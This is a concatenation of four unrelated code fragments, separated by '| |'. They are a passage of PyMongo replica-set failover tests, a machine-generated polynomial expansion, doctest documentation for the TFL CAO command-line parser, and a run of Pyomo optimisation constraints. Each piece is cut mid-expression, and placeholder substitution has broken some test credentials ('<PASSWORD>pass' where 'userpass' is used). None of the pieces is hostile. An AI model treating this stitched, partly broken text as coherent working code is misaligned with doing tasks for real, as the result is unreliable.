self.assertTrue(MongoClient(
unpartition_node(primary), use_greenlets=use_greenlets,
read_preference=PRIMARY_PREFERRED
).admin.command('ismaster')['ismaster'])
# PRIMARY
assertReadFrom(primary, PRIMARY)
# PRIMARY_PREFERRED
assertReadFrom(primary, PRIMARY_PREFERRED)
assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)
# SECONDARY
assertReadFrom(None, SECONDARY)
assertReadFrom(None, SECONDARY, self.other_secondary_dc)
assertReadFrom(None, SECONDARY, {'dc': 'ny'})
# SECONDARY_PREFERRED
assertReadFrom(primary, SECONDARY_PREFERRED)
assertReadFrom(primary, SECONDARY_PREFERRED, self.secondary_dc)
assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})
assertReadFrom(primary, SECONDARY_PREFERRED, {'dc': 'ny'})
# NEAREST
assertReadFrom(primary, NEAREST)
assertReadFrom(None, NEAREST, self.secondary_dc)
assertReadFrom(None, NEAREST, {'name': 'secondary'})
# Even if primary's slow, still read from it
self.set_ping_time(primary, 100)
assertReadFrom(primary, NEAREST)
assertReadFrom(None, NEAREST, self.secondary_dc)
self.clear_ping_times()
def test_pinning(self):
# To make the code terser, copy modes into local scope
PRIMARY = ReadPreference.PRIMARY
PRIMARY_PREFERRED = ReadPreference.PRIMARY_PREFERRED
SECONDARY = ReadPreference.SECONDARY
SECONDARY_PREFERRED = ReadPreference.SECONDARY_PREFERRED
NEAREST = ReadPreference.NEAREST
c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets,
auto_start_request=True)
# Verify that changing the mode unpins the member. We'll try it for
# every relevant change of mode.
for mode0, mode1 in permutations(
(PRIMARY, SECONDARY, SECONDARY_PREFERRED, NEAREST), 2
):
# Try reading and then changing modes and reading again, see if we
# read from a different host
for _ in range(1000):
# pin to this host
host = utils.read_from_which_host(c, mode0)
# unpin?
new_host = utils.read_from_which_host(c, mode1)
if host != new_host:
# Reading with a different mode unpinned, hooray!
break
else:
self.fail(
"Changing from mode %s to mode %s never unpinned" % (
modes[mode0], modes[mode1]))
# Now verify changing the tag_sets unpins the member.
tags0 = [{'a': 'a'}, {}]
tags1 = [{'a': 'x'}, {}]
for _ in range(1000):
host = utils.read_from_which_host(c, NEAREST, tags0)
new_host = utils.read_from_which_host(c, NEAREST, tags1)
if host != new_host:
break
else:
self.fail(
"Changing from tags %s to tags %s never unpinned" % (
tags0, tags1))
# Finally, verify changing the secondary_acceptable_latency_ms unpins
# the member.
for _ in range(1000):
host = utils.read_from_which_host(c, SECONDARY, None, 15)
new_host = utils.read_from_which_host(c, SECONDARY, None, 20)
if host != new_host:
break
else:
self.fail(
"Changing secondary_acceptable_latency_ms from 15 to 20"
" never unpinned")
def tearDown(self):
self.c.close()
super(TestReadPreference, self).tearDown()
class TestReplicaSetAuth(HATestCase):
def setUp(self):
members = [
{},
{'priority': 0},
{'priority': 0},
]
res = ha_tools.start_replica_set(members, auth=True)
self.c = MongoReplicaSetClient(res[0], replicaSet=res[1],
use_greenlets=use_greenlets)
# Add an admin user to enable auth
self.c.admin.add_user('admin', '<PASSWORD>')
self.c.admin.authenticate('admin', '<PASSWORD>')
self.db = self.c.pymongo_ha_auth
self.db.add_user('user', 'userpass')
self.c.admin.logout()
def test_auth_during_failover(self):
self.assertTrue(self.db.authenticate('user', '<PASSWORD>pass'))
self.assertTrue(self.db.foo.insert({'foo': 'bar'},
safe=True, w=3, wtimeout=3000))
self.db.logout()
self.assertRaises(OperationFailure, self.db.foo.find_one)
primary = self.c.primary
ha_tools.kill_members(['%s:%d' % primary], 2)
# Let monitor notice primary's gone
sleep(2 * MONITOR_INTERVAL)
self.assertFalse(primary == self.c.primary)
# Make sure we can still authenticate
self.assertTrue(self.db.authenticate('user', 'userpass'))
# And still query.
self.db.read_preference = PRIMARY_PREFERRED
self.assertEqual('bar', self.db.foo.find_one()['foo'])
def tearDown(self):
self.c.close()
super(TestReplicaSetAuth, self).tearDown()
class TestAlive(HATestCase):
def setUp(self):
members = [{}, {}]
self.seed, self.name = ha_tools.start_replica_set(members)
def test_alive(self):
primary = ha_tools.get_primary()
secondary = ha_tools.get_random_secondary()
primary_cx = MongoClient(primary, use_greenlets=use_greenlets)
secondary_cx = MongoClient(secondary, use_greenlets=use_greenlets)
rsc = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
try:
self.assertTrue(primary_cx.alive())
self.assertTrue(secondary_cx.alive())
self.assertTrue(rsc.alive())
ha_tools.kill_primary()
time.sleep(0.5)
self.assertFalse(primary_cx.alive())
self.assertTrue(secondary_cx.alive())
self.assertFalse(rsc.alive())
ha_tools.kill_members([secondary], 2)
time.sleep(0.5)
self.assertFalse(primary_cx.alive())
self.assertFalse(secondary_cx.alive())
self.assertFalse(rsc.alive())
finally:
rsc.close()
class TestMongosHighAvailability(HATestCase):
def setUp(self):
seed_list = ha_tools.create_sharded_cluster()
self.dbname = 'pymongo_mongos_ha'
self.client = MongoClient(seed_list)
self.client.drop_database(self.dbname)
def test_mongos_ha(self):
coll = self.client[self.dbname].test
self.assertTrue(coll.insert({'foo': 'bar'}))
first = '%s:%d' % (self.client.host, self.client.port)
ha_tools.kill_mongos(first)
# Fail first attempt
self.assertRaises(AutoReconnect, coll.count)
# Find new mongos
self.assertEqual(1, coll.count())
second = '%s:%d' % (self.client.host, self.client.port)
self.assertNotEqual(first, second)
ha_tools.kill_mongos(second)
# Fail first attempt
self.assertRaises(AutoReconnect, coll.count)
# Find new mongos
self.assertEqual(1, coll.count())
third = '%s:%d' % (self.client.host, self.client.port)
self.assertNotEqual(second, third)
ha_tools.kill_mongos(third)
# Fail first attempt
self.assertRaises(AutoReconnect, coll.count)
# We've killed all three, restart one.
ha_tools.restart_mongos(first)
# Find new mongos
self.assertEqual(1, coll.count())
def tearDown(self):
self.client.drop_database(self.dbname)
super(TestMongosHighAvailability, self).tearDown()
class TestReplicaSetRequest(HATestCase):
def setUp(self):
members = [{}, {}, {'arbiterOnly': True}]
res = ha_tools.start_replica_set(members)
self.c = MongoReplicaSetClient(res[0], replicaSet=res[1],
use_greenlets=use_greenlets,
auto_start_request=True)
def test_request_during_failover(self):
primary = _partition_node(ha_tools.get_primary())
| |
252588 * uk_153
+ 112908 * uk_154
+ 5929741 * uk_155
+ 7109137 * uk_156
+ 3177817 * uk_157
+ 8523109 * uk_158
+ 3809869 * uk_159
+ 4593241 * uk_16
+ 1703029 * uk_160
+ 10218313 * uk_161
+ 4567633 * uk_162
+ 2041753 * uk_163
+ 912673 * uk_164
+ 3969 * uk_17
+ 7056 * uk_18
+ 6111 * uk_19
+ 63 * uk_2
+ 756 * uk_20
+ 11403 * uk_21
+ 13671 * uk_22
+ 6111 * uk_23
+ 12544 * uk_24
+ 10864 * uk_25
+ 1344 * uk_26
+ 20272 * uk_27
+ 24304 * uk_28
+ 10864 * uk_29
+ 112 * uk_3
+ 9409 * uk_30
+ 1164 * uk_31
+ 17557 * uk_32
+ 21049 * uk_33
+ 9409 * uk_34
+ 144 * uk_35
+ 2172 * uk_36
+ 2604 * uk_37
+ 1164 * uk_38
+ 32761 * uk_39
+ 97 * uk_4
+ 39277 * uk_40
+ 17557 * uk_41
+ 47089 * uk_42
+ 21049 * uk_43
+ 9409 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 251138340208 * uk_47
+ 217503741073 * uk_48
+ 26907679308 * uk_49
+ 12 * uk_5
+ 405857496229 * uk_50
+ 486580534153 * uk_51
+ 217503741073 * uk_52
+ 187944057 * uk_53
+ 334122768 * uk_54
+ 289374183 * uk_55
+ 35798868 * uk_56
+ 539966259 * uk_57
+ 647362863 * uk_58
+ 289374183 * uk_59
+ 181 * uk_6
+ 593996032 * uk_60
+ 514442992 * uk_61
+ 63642432 * uk_62
+ 959940016 * uk_63
+ 1150867312 * uk_64
+ 514442992 * uk_65
+ 445544377 * uk_66
+ 55118892 * uk_67
+ 831376621 * uk_68
+ 996733297 * uk_69
+ 217 * uk_7
+ 445544377 * uk_70
+ 6818832 * uk_71
+ 102850716 * uk_72
+ 123307212 * uk_73
+ 55118892 * uk_74
+ 1551331633 * uk_75
+ 1859883781 * uk_76
+ 831376621 * uk_77
+ 2229805417 * uk_78
+ 996733297 * uk_79
+ 97 * uk_8
+ 445544377 * uk_80
+ 250047 * uk_81
+ 444528 * uk_82
+ 384993 * uk_83
+ 47628 * uk_84
+ 718389 * uk_85
+ 861273 * uk_86
+ 384993 * uk_87
+ 790272 * uk_88
+ 684432 * uk_89
+ 2242306609 * uk_9
+ 84672 * uk_90
+ 1277136 * uk_91
+ 1531152 * uk_92
+ 684432 * uk_93
+ 592767 * uk_94
+ 73332 * uk_95
+ 1106091 * uk_96
+ 1326087 * uk_97
+ 592767 * uk_98
+ 9072 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 138348 * uk_100
+ 164052 * uk_101
+ 84672 * uk_102
+ 2109807 * uk_103
+ 2501793 * uk_104
+ 1291248 * uk_105
+ 2966607 * uk_106
+ 1531152 * uk_107
+ 790272 * uk_108
+ 2685619 * uk_109
+ 6582067 * uk_11
+ 2163952 * uk_110
+ 231852 * uk_111
+ 3535743 * uk_112
+ 4192657 * uk_113
+ 2163952 * uk_114
+ 1743616 * uk_115
+ 186816 * uk_116
+ 2848944 * uk_117
+ 3378256 * uk_118
+ 1743616 * uk_119
+ 5303536 * uk_12
+ 20016 * uk_120
+ 305244 * uk_121
+ 361956 * uk_122
+ 186816 * uk_123
+ 4654971 * uk_124
+ 5519829 * uk_125
+ 2848944 * uk_126
+ 6545371 * uk_127
+ 3378256 * uk_128
+ 1743616 * uk_129
+ 568236 * uk_13
+ 1404928 * uk_130
+ 150528 * uk_131
+ 2295552 * uk_132
+ 2722048 * uk_133
+ 1404928 * uk_134
+ 16128 * uk_135
+ 245952 * uk_136
+ 291648 * uk_137
+ 150528 * uk_138
+ 3750768 * uk_139
+ 8665599 * uk_14
+ 4447632 * uk_140
+ 2295552 * uk_141
+ 5273968 * uk_142
+ 2722048 * uk_143
+ 1404928 * uk_144
+ 1728 * uk_145
+ 26352 * uk_146
+ 31248 * uk_147
+ 16128 * uk_148
+ 401868 * uk_149
+ 10275601 * uk_15
+ 476532 * uk_150
+ 245952 * uk_151
+ 565068 * uk_152
+ 291648 * uk_153
+ 150528 * uk_154
+ 6128487 * uk_155
+ 7267113 * uk_156
+ 3750768 * uk_157
+ 8617287 * uk_158
+ 4447632 * uk_159
+ 5303536 * uk_16
+ 2295552 * uk_160
+ 10218313 * uk_161
+ 5273968 * uk_162
+ 2722048 * uk_163
+ 1404928 * uk_164
+ 3969 * uk_17
+ 8757 * uk_18
+ 7056 * uk_19
+ 63 * uk_2
+ 756 * uk_20
+ 11529 * uk_21
+ 13671 * uk_22
+ 7056 * uk_23
+ 19321 * uk_24
+ 15568 * uk_25
+ 1668 * uk_26
+ 25437 * uk_27
+ 30163 * uk_28
+ 15568 * uk_29
+ 139 * uk_3
+ 12544 * uk_30
+ 1344 * uk_31
+ 20496 * uk_32
+ 24304 * uk_33
+ 12544 * uk_34
+ 144 * uk_35
+ 2196 * uk_36
+ 2604 * uk_37
+ 1344 * uk_38
+ 33489 * uk_39
+ 112 * uk_4
+ 39711 * uk_40
+ 20496 * uk_41
+ 47089 * uk_42
+ 24304 * uk_43
+ 12544 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 311680618651 * uk_47
+ 251138340208 * uk_48
+ 26907679308 * uk_49
+ 12 * uk_5
+ 410342109447 * uk_50
+ 486580534153 * uk_51
+ 251138340208 * uk_52
+ 187944057 * uk_53
+ 414670221 * uk_54
+ 334122768 * uk_55
+ 35798868 * uk_56
+ 545932737 * uk_57
+ 647362863 * uk_58
+ 334122768 * uk_59
+ 183 * uk_6
+ 914907313 * uk_60
+ 737191504 * uk_61
+ 78984804 * uk_62
+ 1204518261 * uk_63
+ 1428308539 * uk_64
+ 737191504 * uk_65
+ 593996032 * uk_66
+ 63642432 * uk_67
+ 970547088 * uk_68
+ 1150867312 * uk_69
+ 217 * uk_7
+ 593996032 * uk_70
+ 6818832 * uk_71
+ 103987188 * uk_72
+ 123307212 * uk_73
+ 63642432 * uk_74
+ 1585804617 * uk_75
+ 1880434983 * uk_76
+ 970547088 * uk_77
+ 2229805417 * uk_78
+ 1150867312 * uk_79
+ 112 * uk_8
+ 593996032 * uk_80
+ 250047 * uk_81
+ 551691 * uk_82
+ 444528 * uk_83
+ 47628 * uk_84
+ 726327 * uk_85
+ 861273 * uk_86
+ 444528 * uk_87
+ 1217223 * uk_88
+ 980784 * uk_89
+ 2242306609 * uk_9
+ 105084 * uk_90
+ 1602531 * uk_91
+ 1900269 * uk_92
+ 980784 * uk_93
+ 790272 * uk_94
+ 84672 * uk_95
+ 1291248 * uk_96
+ 1531152 * uk_97
+ 790272 * uk_98
+ 9072 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 139860 * uk_100
+ 164052 * uk_101
+ 105084 * uk_102
+ 2156175 * uk_103
+ 2529135 * uk_104
+ 1620045 * uk_105
+ 2966607 * uk_106
+ 1900269 * uk_107
+ 1217223 * uk_108
+ 5639752 * uk_109
+ 8428834 * uk_11
+ 4404076 * uk_110
+ 380208 * uk_111
+ 5861540 * uk_112
+ 6875428 * uk_113
+ 4404076 * uk_114
+ 3439138 * uk_115
+ 296904 * uk_116
+ 4577270 * uk_117
+ 5369014 * uk_118
+ 3439138 * uk_119
+ 6582067 * uk_12
+ 25632 * uk_120
+ 395160 * uk_121
+ 463512 * uk_122
+ 296904 * uk_123
+ 6092050 * uk_124
+ 7145810 * uk_125
+ 4577270 * uk_126
+ 8381842 * uk_127
+ 5369014 * uk_128
+ 3439138 * uk_129
+ 568236 * uk_13
+ 2685619 * uk_130
+ 231852 * uk_131
+ 3574385 * uk_132
+ 4192657 * uk_133
+ 2685619 * uk_134
+ 20016 * uk_135
+ 308580 * uk_136
+ 361956 * uk_137
+ 231852 * uk_138
+ 4757275 * uk_139
+ 8760305 * uk_14
+ 5580155 * uk_140
+ 3574385 * uk_141
+ 6545371 * uk_142
+ 4192657 * uk_143
+ 2685619 * uk_144
+ 1728 * | |
The values for arguments and options can be
parsed from :data:`sys.argv` or supplied by a client via keyword arguments.
A command is defined by creating an instance of :class:`Cmd`
with the :meth:`~Cmd.__init__` arguments defining the command's arguments,
options, and possibly sub-commands.
Calling a :class:`Cmd` instance with an argument array, e.g.,
:data:`sys.argv[1:]`, parses the arguments and options in the array, stores
their values in an :class:`CAO` instance, and calls the `handler`.
Calling a :class:`Cmd` instance with keyword arguments initializes
the argument and option values from those values and calls the
`handler`.
Alternatively, the methods :meth:`~Cmd.parse` or :meth:`~Cmd.use` can be
called by a client directly, should explicit flow control be required.
A typical use of :class:`Cmd` looks like::
>>> def main (cao) :
... "Explanation of the purpose of the command"
... print ("Starting", cao._name)
... for fn in cao.argv :
... if cao.verbose :
... print (" " * cao.indent, "processing", fn)
... ### do whatever needs to be done
... print ("Finished", cao._name)
...
>>> cmd = TFL.CAO.Cmd \
... ( handler = main
... , args = ( "file:P?File(s) to process",)
... , opts =
... ( "indent:I=4?Number of spaces to use for indentation"
... , "-output:P"
... "?Name of file to receive output (default: standard output)"
... , "-period:I,#10?Periods to consider"
... , "-verbose:B?Print additional information to standard error"
... , Opt.Config
... ( name = "config"
... , auto_split = ":::"
... , description = "File(s) with configuration options"
... )
... , Opt.Config_Bundle
... ( name = "special_config"
... , description = "Predefined set of configuration options"
... , config_dct = dict (indent = 2, period = 8)
... )
... )
... , min_args = 2
... , max_args = 8
... , name = "cao_example"
... )
>>> if __name__ == "__main__" :
... cmd ()
`cmd` contains the specification of arguments and options. ::
>>> type (cmd.indent)
<class 'CAO.Int'>
>>> cmd.indent
'indent:I=4#1?Number of spaces to use for indentation'
>>> print_prepr ((cmd.indent.name, cmd.indent.default, cmd.indent.description, cmd.indent.auto_split, cmd.indent.max_number))
('indent', [4], 'Number of spaces to use for indentation', '', 1)
>>> type (cmd.verbose)
<class 'CAO.Bool'>
>>> cmd.verbose
'-verbose:B=False#1?Print additional information to standard error'
The methods :meth:`~Cmd.parse` and :meth:`~Cmd.use` return a instance of
:class:`CAO` which provides access to all argument and option values
specified. ::
>>> with expect_except (Err) :
... cao = cmd.parse (["-verbose"])
Err: Command/argument/option error: Need at least 2 arguments, got 0
>>> cao = cmd.parse (["-verbose", "path1", "path2"])
>>> print (cao.indent, type (cao.indent).__name__)
4 int
>>> print (cao.output)
None
>>> print (cao.verbose)
True
>>> cao.argn
2
>>> print_prepr (cao.argv)
['path1', 'path2']
>>> print_prepr (cao.file)
'path1'
>>> cao ()
Starting cao_example
processing path1
processing path2
Finished cao_example
>>> cmd.help (cao)
cao_example file ...
Explanation of the purpose of the command
<BLANKLINE>
file : Path
File(s) to process
<BLANKLINE>
argv : ['path1', 'path2']
<BLANKLINE>
-Pdb_on_Exception : Bool
Start python debugger pdb on exception
-config : Config [] split on ':::'
File(s) with configuration options
In case of multiple matching config files, the last value
specified for an option wins. Non-existing path values specified
for `-config` will be silently ignored.
-help : Help [] split on ','
Display help about command
-indent : Int
Number of spaces to use for indentation
-output : Path
Name of file to receive output (default: standard output)
-period : Int [10] split on ','
Periods to consider
-special_config : Config_Bundle
Predefined set of configuration options
{ 'indent' : 2
, 'period' : 8
}
-verbose : Bool
Print additional information to standard error
>>> cao_p = cmd.parse (["-period=1,2,3", "path1", "-period", "4", "path2"])
>>> cao_p ()
Starting cao_example
Finished cao_example
>>> print (cao_p.period, type (cao_p.period).__name__)
[1, 2, 3, 4] list
>>> print_prepr (cao_p ["period"])
[1, 2, 3, 4]
>>> print_prepr (cao_p ["period:raw"])
['1,2,3', '4']
>>> cmd.help (cao_p, spec = ["vals"])
Actual option and argument values of cao_example
-Pdb_on_Exception = False
-config = None
()
-help = []
-indent = 4
-output = None
()
-period = [ '1,2,3'
, '4'
]
[ 1
, 2
, 3
, 4
]
-special_config = {}
-verbose = False
file = path1
>>> cao_s = cmd.parse (["-special_config", "path1", "path2"])
>>> cmd.help (cao_s)
cao_example file ...
Explanation of the purpose of the command
<BLANKLINE>
file : Path
File(s) to process
<BLANKLINE>
argv : ['path1', 'path2']
<BLANKLINE>
-Pdb_on_Exception : Bool
Start python debugger pdb on exception
-config : Config [] split on ':::'
File(s) with configuration options
In case of multiple matching config files, the last value
specified for an option wins. Non-existing path values specified
for `-config` will be silently ignored.
-help : Help [] split on ','
Display help about command
-indent : Int
Number of spaces to use for indentation
-output : Path
Name of file to receive output (default: standard output)
-period : Int [10] split on ','
Periods to consider
-special_config : Config_Bundle
Predefined set of configuration options
{ 'indent' : 2
, 'period' : 8
}
-verbose : Bool
Print additional information to standard error
>>> cmd.help (cao_s, spec = ["vals"])
Actual option and argument values of cao_example
-Pdb_on_Exception = False
-config = None
()
-help = []
-indent = 2
-output = None
()
-period = 8
[8]
-special_config = True
{ 'indent' : 2
, 'period' : 8
}
-verbose = False
file = path1
>>> cmd.help (cao_s, spec = ["config"])
Configuration options
cao_example has the configuration options:
<BLANKLINE>
config
<BLANKLINE>
Each of these options can specify any number of configuration files. The
config options will be processed in the sequence given above; for each
config option, its files will be processed in the sequence they are
specified on the command line (or by the default for the option in
question). Config files that don't exist are silently ignored.
<BLANKLINE>
Each config file must contain assignments in python syntax, the assigned
values must be python strings, i.e., raw values.
<BLANKLINE>
Assignments to the name of arguments or options will override the default
for the argument/option in question. If one specific argument/option is
assigned to in several config files, the last assignment wins.
<BLANKLINE>
Assignments to names that aren't names of arguments or options will be
interpreted as keyword assignments.
<BLANKLINE>
A typical config file looks like (assuming that all lines start in column
1, i.e., without leading whitespace)
<BLANKLINE>
cookie_salt = b"<PASSWORD>"
<BLANKLINE>
input_encoding = "utf-8"
<BLANKLINE>
locale_code = "en"
"""
### «text» ### start of doctest
__test__ = dict \
( test = """
Usage examples
----------------
Many of the following tests/examples pass a simple `show` function as
`handler`. `show` just displays some information about the command and the
values passed to it::
>>> cmd = Cmd (show, name = "Test", args = ("adam:P=/tmp/test?First arg", "bert:I=42"), opts = ("-verbose:B", "-year:I,=2010"))
>>> cmd._arg_list
['adam:P=/tmp/test#1?First arg', 'bert:I=42#1?']
>>> sorted (str (o) for o in pyk.itervalues (cmd._opt_dict))
["'-Pdb_on_Exception:B=False#1?Start python debugger pdb on exception'", "'-help Display help about command'", "'-verbose:B=False#1?'", "'year:I,=2010#0?'"]
>>> cmd.adam, cmd.verbose
('adam:P=/tmp/test#1?First arg', '-verbose:B=False#1?')
>>> cmd.adam.__class__
<class 'CAO.Path'>
>>> cmd (["-year=2000", "-year", "1999", "-v=no", "/tmp/tmp"])
Test
Arguments : ['adam', 'bert']
-Pdb_on_Exception : False
-help : []
-verbose : False
-year : [2000, 1999]
adam : '/tmp/tmp'
bert : 42
argv : ['/tmp/tmp', 42]
>>> cao = cmd.parse (["-year=2000", "-year", "1999", "-v=no", "/tmp/tmp"])
>>> cao.year
[2000, 1999]
>>> cao.verbose
False
>>> print_prepr (cao.adam)
'/tmp/tmp'
>>> cao.bert
42
>>> print_prepr (cao.argv)
['/tmp/tmp', 42]
>>> cmd (["-year=2000", "-year", "1999", "-verb", "/tmp/tmp", "137"])
Test
Arguments : ['adam', 'bert']
-Pdb_on_Exception : False
-help : []
-verbose : True
-year : [2000, 1999]
adam : '/tmp/tmp'
bert : 137
argv : ['/tmp/tmp', 137]
>>> cap = cmd.parse (["-year=2000", "-year", "1999", "-verb", "/tmp/tmp", "137"])
>>> cap.verbose
True
>>> print_prepr (cap.argv)
['/tmp/tmp', 137]
>>> caq = cmd.parse (["/tmp/tmp", "137"])
>>> caq.verbose
False
>>> c1 = Cmd (show, name = "one", args = ("aaa:S", "bbb:S"), opts = ("y:I", "Z:B"))
>>> c1 ([])
one
Arguments : ['aaa', 'bbb']
-Pdb_on_Exception : False
-Z : False
| |
- 1.25*log(1 + m.x724/(1e-6 + m.b985)))*(1e-6 + m.b985) <= 0)
m.c803 = Constraint(expr= m.x725 == 0)
m.c804 = Constraint(expr= m.x726 == 0)
m.c805 = Constraint(expr= m.x727 == 0)
m.c806 = Constraint(expr= m.x758 == 0)
m.c807 = Constraint(expr= m.x759 == 0)
m.c808 = Constraint(expr= m.x760 == 0)
m.c809 = Constraint(expr= m.x302 - m.x722 - m.x725 == 0)
m.c810 = Constraint(expr= m.x303 - m.x723 - m.x726 == 0)
m.c811 = Constraint(expr= m.x304 - m.x724 - m.x727 == 0)
m.c812 = Constraint(expr= m.x317 - m.x752 - m.x758 == 0)
m.c813 = Constraint(expr= m.x318 - m.x753 - m.x759 == 0)
m.c814 = Constraint(expr= m.x319 - m.x754 - m.x760 == 0)
m.c815 = Constraint(expr= m.x722 - 0.705049913072943*m.b983 <= 0)
m.c816 = Constraint(expr= m.x723 - 0.705049913072943*m.b984 <= 0)
m.c817 = Constraint(expr= m.x724 - 0.705049913072943*m.b985 <= 0)
m.c818 = Constraint(expr= m.x725 + 0.705049913072943*m.b983 <= 0.705049913072943)
m.c819 = Constraint(expr= m.x726 + 0.705049913072943*m.b984 <= 0.705049913072943)
m.c820 = Constraint(expr= m.x727 + 0.705049913072943*m.b985 <= 0.705049913072943)
m.c821 = Constraint(expr= m.x752 - 0.666992981045719*m.b983 <= 0)
m.c822 = Constraint(expr= m.x753 - 0.666992981045719*m.b984 <= 0)
m.c823 = Constraint(expr= m.x754 - 0.666992981045719*m.b985 <= 0)
m.c824 = Constraint(expr= m.x758 + 0.666992981045719*m.b983 <= 0.666992981045719)
m.c825 = Constraint(expr= m.x759 + 0.666992981045719*m.b984 <= 0.666992981045719)
m.c826 = Constraint(expr= m.x760 + 0.666992981045719*m.b985 <= 0.666992981045719)
m.c827 = Constraint(expr=(m.x764/(1e-6 + m.b986) - 0.9*log(1 + m.x728/(1e-6 + m.b986)))*(1e-6 + m.b986) <= 0)
m.c828 = Constraint(expr=(m.x765/(1e-6 + m.b987) - 0.9*log(1 + m.x729/(1e-6 + m.b987)))*(1e-6 + m.b987) <= 0)
m.c829 = Constraint(expr=(m.x766/(1e-6 + m.b988) - 0.9*log(1 + m.x730/(1e-6 + m.b988)))*(1e-6 + m.b988) <= 0)
m.c830 = Constraint(expr= m.x731 == 0)
m.c831 = Constraint(expr= m.x732 == 0)
m.c832 = Constraint(expr= m.x733 == 0)
m.c833 = Constraint(expr= m.x770 == 0)
m.c834 = Constraint(expr= m.x771 == 0)
m.c835 = Constraint(expr= m.x772 == 0)
m.c836 = Constraint(expr= m.x305 - m.x728 - m.x731 == 0)
m.c837 = Constraint(expr= m.x306 - m.x729 - m.x732 == 0)
m.c838 = Constraint(expr= m.x307 - m.x730 - m.x733 == 0)
m.c839 = Constraint(expr= m.x320 - m.x764 - m.x770 == 0)
m.c840 = Constraint(expr= m.x321 - m.x765 - m.x771 == 0)
m.c841 = Constraint(expr= m.x322 - m.x766 - m.x772 == 0)
m.c842 = Constraint(expr= m.x728 - 0.705049913072943*m.b986 <= 0)
m.c843 = Constraint(expr= m.x729 - 0.705049913072943*m.b987 <= 0)
m.c844 = Constraint(expr= m.x730 - 0.705049913072943*m.b988 <= 0)
m.c845 = Constraint(expr= m.x731 + 0.705049913072943*m.b986 <= 0.705049913072943)
m.c846 = Constraint(expr= m.x732 + 0.705049913072943*m.b987 <= 0.705049913072943)
m.c847 = Constraint(expr= m.x733 + 0.705049913072943*m.b988 <= 0.705049913072943)
m.c848 = Constraint(expr= m.x764 - 0.480234946352917*m.b986 <= 0)
m.c849 = Constraint(expr= m.x765 - 0.480234946352917*m.b987 <= 0)
m.c850 = Constraint(expr= m.x766 - 0.480234946352917*m.b988 <= 0)
m.c851 = Constraint(expr= m.x770 + 0.480234946352917*m.b986 <= 0.480234946352917)
m.c852 = Constraint(expr= m.x771 + 0.480234946352917*m.b987 <= 0.480234946352917)
m.c853 = Constraint(expr= m.x772 + 0.480234946352917*m.b988 <= 0.480234946352917)
m.c854 = Constraint(expr=(m.x776/(1e-6 + m.b989) - log(1 + m.x707/(1e-6 + m.b989)))*(1e-6 + m.b989) <= 0)
m.c855 = Constraint(expr=(m.x777/(1e-6 + m.b990) - log(1 + m.x708/(1e-6 + m.b990)))*(1e-6 + m.b990) <= 0)
m.c856 = Constraint(expr=(m.x778/(1e-6 + m.b991) - log(1 + m.x709/(1e-6 + m.b991)))*(1e-6 + m.b991) <= 0)
m.c857 = Constraint(expr= m.x713 == 0)
m.c858 = Constraint(expr= m.x714 == 0)
m.c859 = Constraint(expr= m.x715 == 0)
m.c860 = Constraint(expr= m.x779 == 0)
m.c861 = Constraint(expr= m.x780 == 0)
m.c862 = Constraint(expr= m.x781 == 0)
m.c863 = Constraint(expr= m.x296 - m.x707 - m.x713 == 0)
m.c864 = Constraint(expr= m.x297 - m.x708 - m.x714 == 0)
m.c865 = Constraint(expr= m.x298 - m.x709 - m.x715 == 0)
m.c866 = Constraint(expr= m.x323 - m.x776 - m.x779 == 0)
m.c867 = Constraint(expr= m.x324 - m.x777 - m.x780 == 0)
m.c868 = Constraint(expr= m.x325 - m.x778 - m.x781 == 0)
m.c869 = Constraint(expr= m.x707 - 0.994083415506506*m.b989 <= 0)
m.c870 = Constraint(expr= m.x708 - 0.994083415506506*m.b990 <= 0)
m.c871 = Constraint(expr= m.x709 - 0.994083415506506*m.b991 <= 0)
m.c872 = Constraint(expr= m.x713 + 0.994083415506506*m.b989 <= 0.994083415506506)
m.c873 = Constraint(expr= m.x714 + 0.994083415506506*m.b990 <= 0.994083415506506)
m.c874 = Constraint(expr= m.x715 + 0.994083415506506*m.b991 <= 0.994083415506506)
m.c875 = Constraint(expr= m.x776 - 0.690184503917672*m.b989 <= 0)
m.c876 = Constraint(expr= m.x777 - 0.690184503917672*m.b990 <= 0)
m.c877 = Constraint(expr= m.x778 - 0.690184503917672*m.b991 <= 0)
m.c878 = Constraint(expr= m.x779 + 0.690184503917672*m.b989 <= 0.690184503917672)
m.c879 = Constraint(expr= m.x780 + 0.690184503917672*m.b990 <= 0.690184503917672)
m.c880 = Constraint(expr= m.x781 + 0.690184503917672*m.b991 <= 0.690184503917672)
m.c881 = Constraint(expr= - 0.9*m.x734 + m.x782 == 0)
m.c882 = Constraint(expr= - 0.9*m.x735 + m.x783 == 0)
m.c883 = Constraint(expr= - 0.9*m.x736 + m.x784 == 0)
m.c884 = Constraint(expr= m.x737 == 0)
m.c885 = Constraint(expr= m.x738 == 0)
m.c886 = Constraint(expr= m.x739 == 0)
m.c887 = Constraint(expr= m.x785 == 0)
m.c888 = Constraint(expr= m.x786 == 0)
m.c889 = Constraint(expr= m.x787 == 0)
m.c890 = Constraint(expr= m.x308 - m.x734 - m.x737 == 0)
m.c891 = Constraint(expr= m.x309 - m.x735 - m.x738 == 0)
m.c892 = Constraint(expr= m.x310 - m.x736 - m.x739 == 0)
m.c893 = Constraint(expr= m.x326 - m.x782 - m.x785 == 0)
m.c894 = Constraint(expr= m.x327 - m.x783 - m.x786 == 0)
m.c895 = Constraint(expr= m.x328 - m.x784 - m.x787 == 0)
m.c896 = Constraint(expr= m.x734 - 15*m.b992 <= 0)
m.c897 = Constraint(expr= m.x735 - 15*m.b993 <= 0)
m.c898 = Constraint(expr= m.x736 - 15*m.b994 <= 0)
m.c899 = Constraint(expr= m.x737 + 15*m.b992 <= 15)
m.c900 = Constraint(expr= m.x738 + 15*m.b993 <= 15)
m.c901 = Constraint(expr= m.x739 + 15*m.b994 <= 15)
m.c902 = Constraint(expr= m.x782 - 13.5*m.b992 <= 0)
m.c903 = Constraint(expr= m.x783 - 13.5*m.b993 <= 0)
m.c904 = Constraint(expr= m.x784 - 13.5*m.b994 <= 0)
